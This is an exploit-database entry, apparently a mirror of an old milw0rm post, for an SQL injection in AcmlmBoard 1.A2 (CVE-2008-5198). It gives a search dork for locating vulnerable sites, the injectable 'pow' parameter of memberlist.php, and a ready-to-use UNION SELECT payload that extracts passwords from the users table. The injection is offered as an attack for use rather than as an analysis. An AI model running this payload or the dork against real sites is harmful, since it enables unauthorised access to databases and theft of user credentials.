[] NeoSense
E X P L O I T S
title author type platform port cve id

AcmlmBoard 1.A2 - 'pow' SQL Injection

Author: anonymous
type: webapps
platform: php
port: 
date_added: 2008-06-29 
date_updated: 2016-12-09 
verified: 1 
codes: OSVDB-50129;CVE-2008-5198 
tags: 
aliases:  
screenshot_url:  
application_url: 
######################
#
#AcmlmBoard v1.A2 SQL Injection Vulnerability
#
######################
#
#Bug by: h0yt3r
#
#Dork: "AcmlmBoard v1.A2"
#
##
###
##
#
#This Board Software suffers from some not correctly verified variables which are used in SQL Querys.
#An Attacker can easily get sensitive information from the database by
#injecting unexpected SQL Querys.
#
#SQL Injection:
#http://[target]/[path]/memberlist.php?sort=&pow=[SQL]
#
#PoC:
#memberlist.php?sort=&pow=9%20union%20select%201,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16%20from%20users--+
#
#######################
#
#Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the neverdying h4ck-y0u Team!
#
#######################
#######################

# milw0rm.com [2008-06-30]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.